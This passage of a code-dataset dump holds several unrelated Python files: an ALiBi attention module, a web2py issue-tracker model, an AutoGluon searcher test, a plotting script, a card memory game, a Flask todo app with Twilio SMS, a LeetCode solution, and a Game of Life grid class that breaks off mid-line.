\\bigg) \\\\\n&= \\text{softmax} \\bigg( \\mathbf{q}_i \\mathbf{K}^\\top + m \\cdot \\big[0, 1, \\dots, (i - 1) \\big] \\bigg)\n\\end{align}\n\nwhere $\\mathbf{q}_i \\in \\mathbb{R}^d$ is the query of the $i$-th token, $K \\in \\mathbb{R}^{i \\times d}$ are the keys\nup to $i$, and $d$ the number of features per head.\nNote that the above equality halts because $\\text{softmax}$ is invariant to translations\n (you can add any constant to all elements without changing the result).\n\nHere is [the training code](experiment.html) for a ALiBi model.\n\"\"\"\nimport math\nfrom typing import Optional\n\nimport torch\nfrom torch import nn\nfrom typing import List\n\nclass PrepareForMultiHeadAttention(nn.Module):\n \"\"\"\n \n\n ## Prepare for multi-head attention\n\n This module does a linear transformation and splits the vector into given\n number of heads for multi-head attention.\n This is used to transform **key**, **query**, and **value** vectors.\n \"\"\"\n\n def __init__(self, d_model: int, heads: int, d_k: int, bias: bool):\n super().__init__()\n # Linear layer for linear transform\n self.linear = nn.Linear(d_model, heads * d_k, bias=bias)\n # Number of heads\n self.heads = heads\n # Number of dimensions in vectors in each head\n self.d_k = d_k\n\n def forward(self, x: torch.Tensor):\n # Input has shape `[seq_len, batch_size, d_model]` or `[batch_size, d_model]`.\n # We apply the linear transformation to the last dimension and split that into\n # the heads.\n head_shape = x.shape[:-1]\n\n # Linear transform\n x = self.linear(x)\n\n # Split last dimension into heads\n x = x.view(*head_shape, self.heads, self.d_k)\n\n # Output has shape `[seq_len, batch_size, heads, d_k]` or `[batch_size, heads, d_model]`\n return x\n\n\nclass MultiHeadAttention(nn.Module):\n r\"\"\"\n \n\n ## Multi-Head Attention Module\n\n This computes scaled multi-headed attention for given `query`, `key` and `value` vectors.\n\n $$\\mathop{Attention}(Q, K, V) = \\underset{seq}{\\mathop{softmax}}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n\n In simple terms, it finds keys that matches the query, and gets the values of\n those keys.\n\n It uses dot-product of query and key as the indicator of how matching they are.\n Before taking the $softmax$ the dot-products are scaled by $\\frac{1}{\\sqrt{d_k}}$.\n This is done to avoid large dot-product values causing softmax to\n give very small gradients when $d_k$ is large.\n\n Softmax is calculated along the axis of of the sequence (or time).\n \"\"\"\n\n def __init__(self, heads: int, d_model: int, dropout_prob: float = 0.1, bias: bool = True):\n \"\"\"\n * `heads` is the number of heads.\n * `d_model` is the number of features in the `query`, `key` and `value` vectors.\n \"\"\"\n\n super().__init__()\n\n # Number of features per head\n self.d_k = d_model // heads\n # Number of heads\n self.heads = heads\n\n # These transform the `query`, `key` and `value` vectors for multi-headed attention.\n self.query = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=bias)\n self.key = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=bias)\n self.value = PrepareForMultiHeadAttention(d_model, heads, self.d_k, bias=True)\n\n # Softmax for attention along the time dimension of `key`\n self.softmax = nn.Softmax(dim=1)\n\n # Output layer\n self.output = nn.Linear(d_model, d_model)\n # Dropout\n self.dropout = nn.Dropout(dropout_prob)\n # Scaling factor before the softmax\n self.scale = 1 / math.sqrt(self.d_k)\n\n # We store attentions so that it can be used for logging, or other computations if needed\n self.attn = None\n\n def get_scores(self, query: torch.Tensor, key: torch.Tensor):\n \"\"\"\n ### Calculate scores between queries and keys\n\n This method can be overridden for other variations like relative attention.\n \"\"\"\n\n # Calculate $Q K^\\top$ or $S_{ijbh} = \\sum_d Q_{ibhd} K_{jbhd}$\n return torch.einsum('ibhd,jbhd->ijbh', query, key)\n\n def prepare_mask(self, mask: torch.Tensor, query_shape: List[int], key_shape: List[int]):\n \"\"\"\n `mask` has shape `[seq_len_q, seq_len_k, batch_size]`, where first dimension is the query dimension.\n If the query dimension is equal to $1$ it will be broadcasted.\n \"\"\"\n\n assert mask.shape[0] == 1 or mask.shape[0] == query_shape[0]\n assert mask.shape[1] == key_shape[0]\n assert mask.shape[2] == 1 or mask.shape[2] == query_shape[1]\n\n # Same mask applied to all heads.\n mask = mask.unsqueeze(-1)\n\n # resulting mask has shape `[seq_len_q, seq_len_k, batch_size, heads]`\n return mask\n\n def forward(self, *,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n mask: Optional[torch.Tensor] = None):\n \"\"\"\n `query`, `key` and `value` are the tensors that store\n collection of *query*, *key* and *value* vectors.\n They have shape `[seq_len, batch_size, d_model]`.\n\n `mask` has shape `[seq_len, seq_len, batch_size]` and\n `mask[i, j, b]` indicates whether for batch `b`,\n query at position `i` has access to key-value at position `j`.\n \"\"\"\n\n # `query`, `key` and `value` have shape `[seq_len, batch_size, d_model]`\n seq_len, batch_size, _ = query.shape\n\n if mask is not None:\n mask = self.prepare_mask(mask, query.shape, key.shape)\n\n # Prepare `query`, `key` and `value` for attention computation.\n # These will then have shape `[seq_len, batch_size, heads, d_k]`.\n query = self.query(query)\n key = self.key(key)\n value = self.value(value)\n\n # Compute attention scores $Q K^\\top$.\n # This gives a tensor of shape `[seq_len, seq_len, batch_size, heads]`.\n scores = self.get_scores(query, key)\n\n # Scale scores $\\frac{Q K^\\top}{\\sqrt{d_k}}$\n scores *= self.scale\n\n # Apply mask\n if mask is not None:\n scores = scores.masked_fill(mask == 0, float('-inf'))\n\n # $softmax$ attention along the key sequence dimension\n # $\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)$\n attn = self.softmax(scores)\n\n # Save attentions if debugging\n\n # Apply dropout\n attn = self.dropout(attn)\n\n # Multiply by values\n # $$\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n x = torch.einsum(\"ijbh,jbhd->ibhd\", attn, value)\n\n # Save attentions for any other calculations\n self.attn = attn.detach()\n\n # Concatenate multiple heads\n x = x.reshape(seq_len, batch_size, -1)\n\n # Output layer\n return self.output(x)\n\ndef get_slopes(n_heads: int):\n \"\"\"\n ## Get head-specific slope $m$ for each head\n\n * `n_heads` is the number of heads in the attention layer $n$\n\n The slope for first head is\n\n $$\\frac{1}{2^{\\frac{8}{n}}} = 2^{-\\frac{8}{n}}$$\n\n The slopes for the rest of the heads are in a geometric series with a ratio same as above.\n\n For instance when the number of heads is $8$ the slopes are\n $$\\frac{1}{2^1}, \\frac{1}{2^2}, \\dots, \\frac{1}{2^8}$$\n \"\"\"\n\n # Get the closest power of 2 to `n_heads`.\n # If `n_heads` is not a power of 2, then we first calculate slopes to the closest (smaller) power of 2,\n # and then add the remaining slopes.\n n = 2 ** math.floor(math.log2(n_heads))\n # $2^{-\\frac{8}{n}}$\n m_0 = 2.0 ** (-8.0 / n)\n # $2^{-1\\frac{8}{n}}, 2^{-2 \\frac{8}{n}}, 2^{-3 \\frac{8}{n}}, \\dots$\n m = torch.pow(m_0, torch.arange(1, 1 + n))\n\n # If `n_heads` is not a power of 2, then we add the remaining slopes.\n # We calculate the remaining slopes for $n * 2$ (avoiding slopes added previously).\n # And pick the slopes upto `n_heads`.\n if n < n_heads:\n # $2^{-\\frac{8}{2n}}$\n m_hat_0 = 2.0 ** (-4.0 / n)\n # $2^{-1\\frac{8}{2n}}, 2^{-3 \\frac{8}{2n}}, 2^{-5 \\frac{8}{2n}}, \\dots$\n # Note that we take steps by $2$ to avoid slopes added previously.\n m_hat = torch.pow(m_hat_0, torch.arange(1, 1 + 2 * (n_heads - n), 2))\n # Concatenate the slopes with the remaining slopes.\n m = torch.cat([m, m_hat])\n\n return m\n\n\n@torch.no_grad()\ndef get_alibi_biases(n_heads: int, mask: torch.Tensor):\n \"\"\"\n ## Calculate the attention biases matrix\n\n * `n_heads` is the number of heads in the attention layer\n * `mask` is the attention mask of shape `[seq_len_q, seq_len_k]`\n\n This returns a matrix of shape `[seq_len_q, seq_len_k, n_heads, ]` with ALiBi attention biases.\n \"\"\"\n\n # Get slopes $m$ for each head\n m = get_slopes(n_heads).to(mask.device)\n\n # Calculate distances $[0, 1, \\dots, N]$\n # Here we calculate the distances using the mask.\n #\n # Since it's causal mask we can just use $[0, 1, \\dots, N]$ too.\n # `distance = torch.arange(mask.shape[1], dtype=torch.long, device=mask.device)[None, :]`\n distance = mask.cumsum(dim=-1)\n\n # Multiply them pair-wise to get the AliBi bias matrix\n return distance[:, :, None] * m[None, None, :]\n\n\nclass AlibiMultiHeadAttention(MultiHeadAttention):\n \"\"\"\n ## Attention with Linear Biases (ALiBi)\n\n We override [Multi-Head Attention](../mha.html).\n \"\"\"\n\n def __init__(self, heads: int, d_model: int, dropout_prob: float = 0.1):\n super().__init__(heads, d_model, dropout_prob)\n\n # To cache AliBi the biases\n self.alibi_biases = None\n\n def forward(self, *,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n mask: Optional[torch.Tensor] = None):\n \"\"\"\n `query`, `key` and `value` are the tensors that store\n collection of *query*, *key* and *value* vectors.\n They have shape `[seq_len, batch_size, d_model]`.\n\n `mask` has shape `[seq_len, seq_len, batch_size]` and\n `mask[i, j, b]` indicates whether for batch `b`,\n query at position `i` has access to key-value at position `j`.\n \"\"\"\n\n # ALiBi only works with causal masks.\n assert mask is not None\n assert mask.shape[0] == mask.shape[1] and mask.shape[2] == 1\n\n # `query`, `key` and `value` have shape `[seq_len, batch_size, d_model]`\n seq_len, batch_size, _ = query.shape\n\n # Add head dimension to mask and check its shape.\n mask = self.prepare_mask(mask, query.shape, key.shape)\n\n # Prepare `query`, `key` and `value` for attention computation.\n # These will then have shape `[seq_len, batch_size, heads, d_k]`.\n query = self.query(query)\n key = self.key(key)\n value = self.value(value)\n\n # Compute attention scores $Q K^\\top$.\n # This gives a tensor of shape `[seq_len, seq_len, batch_size, heads]`.\n scores = self.get_scores(query, key)\n\n # Scale scores $\\frac{Q K^\\top}{\\sqrt{d_k}}$\n scores *= self.scale\n\n # Create AliBi biases if it's not cached\n if self.alibi_biases is None or self.alibi_biases.shape[1] < seq_len:\n # `mask` has shape [seq_len, seq_len, 1, 1]\n self.alibi_biases = get_alibi_biases(scores.shape[-1], mask[:, :, 0, 0])\n\n # Add AliBi biases to attention scores.\n # ALiBi biases has shape `[seq_len, seq_len, n_heads]`\n # and `scores` has shape `[seq_len, seq_len, batch_size, n_heads]`\n scores += self.alibi_biases[:seq_len, :seq_len, None, :]\n\n # Apply mask\n scores = scores.masked_fill(mask == 0, float('-inf'))\n\n # $softmax$ attention along the key sequence dimension\n # $\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)$\n attn = self.softmax(scores)\n\n # Apply dropout\n attn = self.dropout(attn)\n\n # Multiply by values\n # $$\\underset{seq}{softmax}\\Bigg(\\frac{Q K^\\top}{\\sqrt{d_k}}\\Bigg)V$$\n x = torch.einsum(\"ijbh,jbhd->ibhd\", attn, value)\n\n # Concatenate multiple heads\n x = x.reshape(seq_len, batch_size, -1)\n\n # Output layer\n return self.output(x)\n\n","repo_name":"Looyyd/Machine-Learning-Toys","sub_path":"alibi.py","file_name":"alibi.py","file_ext":"py","file_size_in_byte":13264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29586293740","text":"from gluon.tools import prettydate\nfrom gluon.sqlhtml import form_factory\nimport os\nimport pickle\nimport hashlib\nimport operator\nimport shutil\n\nIS_ISSUE_SERVER = True if os.path.exists(os.path.join(request.folder, 'ISSUE_SERVER')) else False\nAPPLICATION_URL = \"http://biographer.biologie.hu-berlin.de/biographer\"\n\nJS = lambda x: SCRIPT(x, _type=\"text/javascript\")\n\ndb.define_table('plugin_issue_error',\n Field('hash'),\n Field('ticket', 'list:string'),\n Field('origin'),\n Field('summary'),\n Field('traceback', 'text'),\n )\n\ndb.define_table('plugin_issue',\n Field('open', 'boolean', default=True),\n Field('accept', 'boolean', default=False),\n Field('views', 'integer', default = 0, readable=False, writable=False),\n Field('assign_to', 'list:reference auth_user'),\n Field('error', 'list:reference plugin_issue_error'),\n Field('type', 'list:string'),\n )\ndb.define_table('plugin_issue_comment',\n Field('issue', db.plugin_issue, readable = False, writable = False),\n Field('title', length=160),\n Field('body', 'text', requires=IS_NOT_EMPTY()),\n Field('nickname'),\n Field('email', requires=IS_EMPTY_OR(IS_EMAIL())),\n Field('created_by', db.auth_user, readable = False, writable = False),\n Field('created_on', 'datetime', default=request.now, readable = False, writable = False),\n )\ndb.define_table('plugin_issue_type',\n Field('type'),\n )\ndb.define_table('plugin_issue_vote',\n Field('issue', db.plugin_issue),\n Field('created_by', db.auth_user),\n Field('score', 'integer'),\n )\ndb.define_table('plugin_issue_comment_attachment',\n Field('comment', db.plugin_issue_comment),\n Field('file', 'upload'),\n )\ndb.define_table('plugin_issue_comment_vote',\n Field('comment', db.plugin_issue_comment),\n Field('created_by', db.auth_user),\n Field('up_down', 'boolean'),\n )\n\n#initial setup of some types, types are more like tags\nif not db(db.plugin_issue_type.id>0).count():\n db.plugin_issue_type.insert(type = 'bug')\n db.plugin_issue_type.insert(type = 'proposal')\n db.plugin_issue_type.insert(type = 'help')\n\ndef get_score(issue_id):\n all_votes = db(db_vote.issue == issue_id).select(db_vote.score)\n return sum([r.score for r in all_votes]) if all_votes else 0\n\ndef get_hash2error():\n hash2error = dict()\n error_files_base = os.path.join(request.folder,'errors')\n for fn in os.listdir(error_files_base):\n record = db(db.plugin_issue_error.ticket.contains(fn)).select().first()\n if record:#found ticket in db\n thehash = record.hash\n try:\n hash2error[thehash]['count'] += 1\n except KeyError:\n hash2error[thehash] = dict(count = 1, origin = record.origin, summary = record.summary, traceback = record.traceback, hash = record.hash)\n else:#not found by filename\n try:\n error = pickle.load(open(os.path.join(error_files_base,fn),'r'))\n except IOError:\n continue\n thehash = hashlib.md5(error['traceback']).hexdigest()\n try:\n hash2error[thehash]['count'] += 1\n except KeyError:\n error_lines = error['traceback'].split(\"\\n\")\n last_line = error_lines[-2]\n error_causer = os.path.split(error['layer'])[1]\n hash2error[thehash] = dict(count = 1, origin = error_causer, summary = last_line, hash = thehash, traceback = error['traceback'])\n record = db(db.plugin_issue_error.hash == thehash).select().first()\n if record:#found by hash\n record.update_record(ticket = record.ticket+[fn])\n else:#not found by hash, add now\n record_id = db.plugin_issue_error.insert(hash = thehash, ticket = [fn], origin = error_causer, summary = last_line, traceback = error['traceback'])\n hash2error[thehash]['record_id'] = record.id if record else record_id\n return hash2error\n","repo_name":"biographer/biographer","sub_path":"editor/models/plugin_issue.py","file_name":"plugin_issue.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"6382803134","text":"from math import isclose\nfrom numbers import Number\n\nfrom autogluon.common import space\nfrom autogluon.core.searcher import LocalRandomSearcher\n\n\ndef dictsAlmostEqual(dict1, dict2, rel_tol=1e-8):\n if len(dict1) != len(dict2):\n return False\n for key, item in dict1.items():\n if isinstance(item, dict):\n if not dictsAlmostEqual(dict1[key], dict2[key], rel_tol=rel_tol):\n return False\n else:\n if isinstance(item, Number):\n if not isclose(dict1[key], dict2[key], rel_tol=rel_tol):\n return False\n else:\n if not (dict1[key] == dict2[key]):\n return False\n return True\n\n\ndef test_local_random_searcher():\n search_space = dict(\n a=space.Real(0, 1, default=0.2),\n b=space.Real(0.05, 1, default=0.4, log=True),\n c=space.Int(5, 15),\n d=space.Int(7, 23, default=16),\n e=space.Categorical(\"a\", 7, [\"hello\", 2]),\n )\n\n searcher = LocalRandomSearcher(search_space=search_space)\n\n expected_config_1 = {\"a\": 0.2, \"b\": 0.4, \"c\": 5, \"d\": 16, \"e\": \"a\"}\n expected_config_2 = {\"a\": 0.5488135039273248, \"b\": 0.4260424000595025, \"c\": 8, \"d\": 10, \"e\": 7}\n expected_config_3 = {\"a\": 0.6235636967859723, \"b\": 0.15814742875130683, \"c\": 12, \"d\": 13, \"e\": \"a\"}\n expected_config_4 = {\"a\": 0.9636627605010293, \"b\": 0.1577026248478398, \"c\": 11, \"d\": 14, \"e\": [\"hello\", 2]}\n expected_config_5 = {\"a\": 0.5680445610939323, \"b\": 0.800200824711684, \"c\": 13, \"d\": 16, \"e\": \"a\"}\n\n assert searcher.get_best_reward() == float(\"-inf\")\n config1 = searcher.get_config()\n assert searcher.get_reward(config1) == float(\"-inf\")\n assert searcher.get_best_reward() == float(\"-inf\")\n searcher.update(config1, reward=0.2)\n assert searcher.get_reward(config1) == 0.2\n assert searcher.get_best_reward() == 0.2\n assert searcher.get_best_config() == config1\n\n config2 = searcher.get_config()\n\n config3 = searcher.get_config()\n\n config4 = searcher.get_config()\n searcher.update(config4, reward=0.1)\n assert searcher.get_reward(config4) == 0.1\n assert searcher.get_best_reward() == 0.2\n assert searcher.get_best_config() == config1\n searcher.update(config4, reward=0.5)\n assert searcher.get_reward(config4) == 0.5\n assert searcher.get_best_reward() == 0.5\n assert searcher.get_best_config() == config4\n\n config5 = searcher.get_config()\n\n assert dictsAlmostEqual(expected_config_1, config1)\n assert dictsAlmostEqual(expected_config_2, config2)\n assert dictsAlmostEqual(expected_config_3, config3)\n assert dictsAlmostEqual(expected_config_4, config4)\n assert dictsAlmostEqual(expected_config_5, config5)\n\n assert len(searcher._results) == 5\n","repo_name":"autogluon/autogluon","sub_path":"core/tests/unittests/searcher/test_local_random_searcher.py","file_name":"test_local_random_searcher.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"39388018971","text":"from yanntricks import *\ndef CbCartTuii():\n pspict,fig = SinglePicture(\"CbCartTuii\")\n pspict.dilatation(2)\n\n x=var('x')\n f1=phyFunction(cos(x)**2)\n f2=phyFunction(cos(x)**3*sin(x))\n\n courbe=ParametricCurve(f1,f2).graph(0,2*pi)\n \n\n pspict.DrawGraphs(courbe)\n pspict.DrawDefaultAxes()\n fig.conclude()\n fig.write_the_file()\n\n","repo_name":"LaurentClaessens/mazhe","sub_path":"src_yanntricks/yanntricksCbCartTuii.py","file_name":"yanntricksCbCartTuii.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"29"} +{"seq_id":"22805201932","text":"'''Starts a game of blackjack using commandline argument inputs'''\n\nimport random\nimport time\nimport os\nimport deck\n\ndef get_card_number(i):\n '''Returns a string to print for the card # (aesthetic)'''\n if i > 9:\n return \" {} \".format(i)\n return \" {} \".format(i)\n\ndef get_val_to_print(value):\n '''Returns a string that can be printed for the value (aesthetic)'''\n if value == \"10\":\n return \"| 10 |\"\n\n return \"| {} |\".format(value)\n\ndef get_suit_to_print(suit):\n '''Returns a string that can be printed for the suit (aesthetic)'''\n if suit == \"Hearts\":\n return \"| Hearts |\"\n if suit == \"Spades\":\n return \"| Spades |\"\n if suit == \"Clubs\":\n return \"| Clubs |\"\n if suit == \"Diamonds\":\n return \"|Diamonds|\"\n\n return \"\"\n\ndef show_cards(game_state, moves):\n '''Print out the game state and the cards to the console'''\n for i in range(0, 12, 3):\n card1 = game_state[i]['card']\n state1 = game_state[i]['selected'] or game_state[i]['solved']\n\n card2 = game_state[i+1]['card']\n state2 = game_state[i+1]['selected'] or game_state[i+1]['solved']\n\n card3 = game_state[i+2]['card']\n state3 = game_state[i+2]['selected'] or game_state[i+2]['solved']\n\n val1 = get_val_to_print(card1.value) if state1 else \"| ? |\"\n val2 = get_val_to_print(card2.value) if state2 else \"| ? |\"\n val3 = get_val_to_print(card3.value) if state3 else \"| ? |\"\n\n suit1 = get_suit_to_print(card1.suit) if state1 else \"| ? |\"\n suit2 = get_suit_to_print(card2.suit) if state2 else \"| ? |\"\n suit3 = get_suit_to_print(card3.suit) if state3 else \"| ? |\"\n\n\n print(\" -------- \" + \" \" + \" -------- \" + \" \" + \" -------- \")\n print(\"| |\" + \" \" + \"| |\" + \" \" + \"| |\")\n print(val1 + \" \" + val2 + \" \" + val3)\n print(suit1 + \" \" + suit2 + \" \" + suit3)\n print(\"| |\" + \" \" + \"| |\" + \" \" + \"| |\")\n print(\" -------- \" + \" \" + \" -------- \" + \" \" + \" -------- \")\n print(get_card_number(i+1) + \" \" +\n get_card_number(i+2) + \" \" +\n get_card_number(i+3))\n print()\n\n print(\"Num of moves: \" + str(moves))\n\n\ndef main():\n '''Runs the game'''\n game_deck = deck.Deck() # Get a deck of cards\n cards_chosen = [] # a list to draw 6 cards\n\n # Draw 6 cards from the deck\n for _ in range(6):\n card = game_deck.draw_card()\n cards_chosen.append(card)\n cards_chosen.append(card)\n\n # Shuffle them to make sure same 2 cards don't exist together\n random.shuffle(cards_chosen)\n\n game_state = {} # Stores the state of the game\n for idx, card in enumerate(cards_chosen):\n game_state[idx] = {'card': card, 'solved': False,\n 'selected': False}\n\n num_moves = 0 # Track of number of moves\n num_remaning_matches = 6\n\n print(\"***************************************************\")\n print(\"***** Welcome to Memory Game! ******\")\n print(\"***** Select cards between 1-12 and proceed! ******\")\n print(\"***************************************************\")\n print()\n\n while num_remaning_matches > 0:\n show_cards(game_state, num_moves)\n\n card1 = input(\"\\nSelect first card: \")\n card2 = input(\"Select second card: \")\n\n # Check to see if the input is an integer\n # If it is, convert it\n try:\n card1 = int(card1) - 1\n card2 = int(card2) - 1\n except ValueError:\n print(\"Please enter an integer between 1-12 to select a card\")\n continue\n except:\n print(\"Exiting due to unexpected input\")\n break\n\n # If the card is out of range, ask again\n if card1 < 0 or card1 > 11 or card2 < 0 or card2 > 11 or card1 == card2:\n print(\"Invalid card selection. Please select a card between 1-12\")\n continue\n\n # If card chosen is already solved, pick again\n if game_state[card1]['solved'] or game_state[card2]['solved']:\n print(\"Please select cards which haven't been seen before\")\n continue\n\n num_moves += 1\n\n # Check if the cards selected are the same\n if game_state[card1]['card'] == game_state[card2]['card']:\n num_remaning_matches -= 1\n game_state[card1]['solved'] = True\n game_state[card2]['solved'] = True\n\n show_cards(game_state, num_moves)\n os.system('clear && printf \\'\\\\e[3J\\'')\n # If the cards are not the same\n else:\n game_state[card1]['selected'] = True\n game_state[card2]['selected'] = True\n\n show_cards(game_state, num_moves)\n\n game_state[card1]['selected'] = False\n game_state[card2]['selected'] = False\n\n time.sleep(4)\n os.system('clear && printf \\'\\\\e[3J\\'')\n\n if num_remaning_matches == 0:\n print(\"You win!\")\n print(\"Num of moves: \" + str(num_moves))\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"pranjalgoel3/Memory-Game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43260876535","text":"from flask import Flask, render_template , Response\t\nfrom flask import request , jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom message import client\nimport json\nimport logging\nimport sys\nfrom flask_heroku import Heroku\n\nimport os\nfrom flask_migrate import Migrate\n\n \n\napp = Flask(__name__)\n#app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:Abcd@123456@localhost/learningflask'\n\n\nheroku= Heroku(app)\ndb = SQLAlchemy(app)\n\n\n\nclass User(db.Model):\n\t__tablename__='tasks'\n\tuid=db.Column(db.Integer, primary_key = True)\n\ttaskname = db.Column(db.String(100))\n\n\tdef __init__(self,taskname):\n\t\tself.taskname=taskname\n\n\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\",User=User.query.all())\n\n@app.route(\"/getdata\", methods=['GET'])\ndef get_User(): \n\tmyuser=User.query.all()\n\tif myuser==\"\":\n\t\treturn 404\n\treturn Response(json.dumps({'taskname':[user.taskname for user in myuser]}), mimetype='application/json')\n\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n\t\n\n\t\ttext=request.form['text']\n\t\tif text !=\"\":\n\t\t\tnewuser = User(text)\n\t\t\tdb.session.add(newuser)\n\t\t\tdb.session.commit()\n\t\t\tmessage = client.messages.create(\n\t\t\tto=\"+15122105811\", \tfrom_=\"+17734327410\" , body =\"A task has been added to your todo list : \"+ text)\n\t\t\tprint(message.sid)\n\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\t\t\t\t\n\t\telse:\t\n\t\t\tnewuser = request.form.getlist('removeId')\n\t\t\tif newuser:\n\t\t\t\tfor n in newuser:\n\t\t\t\t\tUser.query.filter_by(uid=n).delete()\n\t\t\t\tdb.session.commit()\n\t\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\t\t\telse:\n\t\t\t\tedituser = request.form.getlist('editId')\n\t\t\t\tif edituser:\n\t\t\t\t\tupdatedText=request.form['updatedText']\n\t\t\t\t\tfor e in edituser:\n\t\t\t\t\t\tUser.query.filter_by(uid=e).update(dict(taskname=updatedText))\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t\treturn render_template(\"index.html\",User=User.query.all())\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\t \n\t\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR)\n\n","repo_name":"PrasannaInamdar/todolist","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72548565197","text":"#\n# @lc app=leetcode id=202 lang=python3\n#\n# [202] Happy Number\n#\n\n# @lc code=start\nclass Solution:\n def isHappy(self, n: int) -> bool:\n seen = set()\n while n not in seen:\n seen.add(n)\n n = sum([int(i) ** 2 for i in str(n)])\n return n == 1\n\n\n# @lc code=end\n","repo_name":"AllenSun7/LeetCode-Python","sub_path":"202.happy-number.py","file_name":"202.happy-number.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14672648597","text":"# _*_coding:utf-8_*_\nfrom __future__ import annotations\nfrom os import environ\n\nif 'PYGAME_HIDE_SUPPORT_PROMPT' not in environ:\n environ['PYGAME_HIDE_SUPPORT_PROMPT'] = ''\ndel environ\n\nimport pygame\nimport numpy as np\nfrom random import choice\nfrom pygame import Surface\nfrom typing import Optional\nfrom math import floor\n\n\nclass Automaton:\n def __init__(self, type: str, alive: bool) -> None:\n self.alive = alive\n self.type = type\n self.must_die = False\n\n def copy(self) -> Automaton:\n return Automaton(self.type, self.alive)\n\n def update(self) -> None:\n if self.must_die:\n self.alive = False\n self.must_die = False\n else:\n self.alive = True\n\n def draw(self, destiny: Surface, x: int, y: int, size: Optional[int] = 10):\n if self.alive:\n pygame.draw.rect(destiny, (100, 0, 0), (x, y, size, size))\n\n\nclass GridUniverse:\n\n def __init__(self, max_width: int, max_height: int, size: Optional[int] = 10, ignore_edge: Optional[bool] = True) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list = []\n\n self.block_size = size\n self.max_width = max_width\n self.max_height = max_height\n self.ignore_edge = ignore_edge\n self.grid_shift_position = (0, 0)\n self.change_block_size(size, max_width, max_height)\n self.position_neighbors = np.array(\n [[-1, -1], [-1, 0], [-1, 1], [0, -1], [0, 1], [1, -1], [1, 0], [1, 1]], dtype=int)\n\n def init_automatons(self) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list.clear()\n for _ in range(self.rows):\n self.automatons_list.append(\n [Automaton('child', False) for _ in range(self.columns)])\n\n def increase_grid(self):\n if self.block_size < 60:\n self.change_block_size(self.block_size + 2)\n\n def decrease_grid(self):\n if self.block_size > 10:\n self.change_block_size(self.block_size - 2)\n\n def change_block_size(self, size: int, width: Optional[int] = None, height: Optional[int] = None) -> None:\n if width is None:\n width = self.max_width\n if height is None:\n height = self.max_height\n (rows, columns) = (int(floor(height / size)), int(floor(width / size)))\n self.rows = rows\n self.columns = columns\n self.height = size * rows\n self.width = size * columns\n self.block_size = size\n self.center_grid()\n self.init_automatons()\n\n def create_automatons(self) -> None:\n self.geration = 0\n self.population_size = 0\n self.automatons_list.clear()\n for i in range(self.rows):\n self.automatons_list.append([])\n for j in range(self.columns):\n self.automatons_list[i].append(\n Automaton(choice(['child', 'adult']), choice([False, True])))\n\n def update_automatons(self) -> None:\n for i in range(self.rows):\n for j in range(self.columns):\n count = 0\n automaton = self.automatons_list[i][j]\n for x, y in self.position_neighbors + [i, j]:\n if self.ignore_edge:\n if self.automatons_list[x % self.rows][y % self.columns].alive:\n count += 1\n else:\n if -1 < x < self.rows and -1 < y < self.columns and self.automatons_list[x][y].alive:\n count += 1\n if count == 3 and (not automaton.alive):\n automaton.must_die = False\n automaton.type = 'child'\n elif (count < 2 or count > 3) and automaton.alive:\n automaton.must_die = True\n automaton.type = 'adult'\n elif (1 < count < 4) and automaton.alive:\n automaton.must_die = False\n automaton.type = 'adult'\n else:\n automaton.must_die = True\n self.population_size = 0\n self.geration += 1\n for rows in self.automatons_list:\n for automaton in rows:\n automaton.update()\n if automaton.alive:\n self.population_size += 1\n\n def center_grid(self):\n self.grid_shift_position = (\n (self.max_width - self.width) // 2, (self.max_height - self.height) // 2)\n\n def toogle_automaton(self, row: int, column: int, alive: bool) -> None:\n automaton = self.automatons_list[row][column]\n if alive and not automaton.alive:\n self.population_size += 1\n elif not alive and automaton.alive:\n self.population_size -= 1\n automaton.alive = alive\n automaton.must_die = not alive\n automaton.type = 'adult'\n\n def draw_automatons(self, destiny: Surface) -> None:\n (shift_x, shift_y) = self.grid_shift_position\n if self.height != self.max_height or self.width != self.max_width:\n destiny.fill((0x4B0082))\n\n pygame.draw.rect(destiny, (190, 190, 190), [\n shift_x, shift_y, self.width, self.height])\n\n for i in range(self.rows):\n for j in range(self.columns):\n self.automatons_list[i][j].draw(\n destiny, shift_x + j * self.block_size, shift_y + i * self.block_size, self.block_size)\n\n pygame.draw.line(destiny, (0), 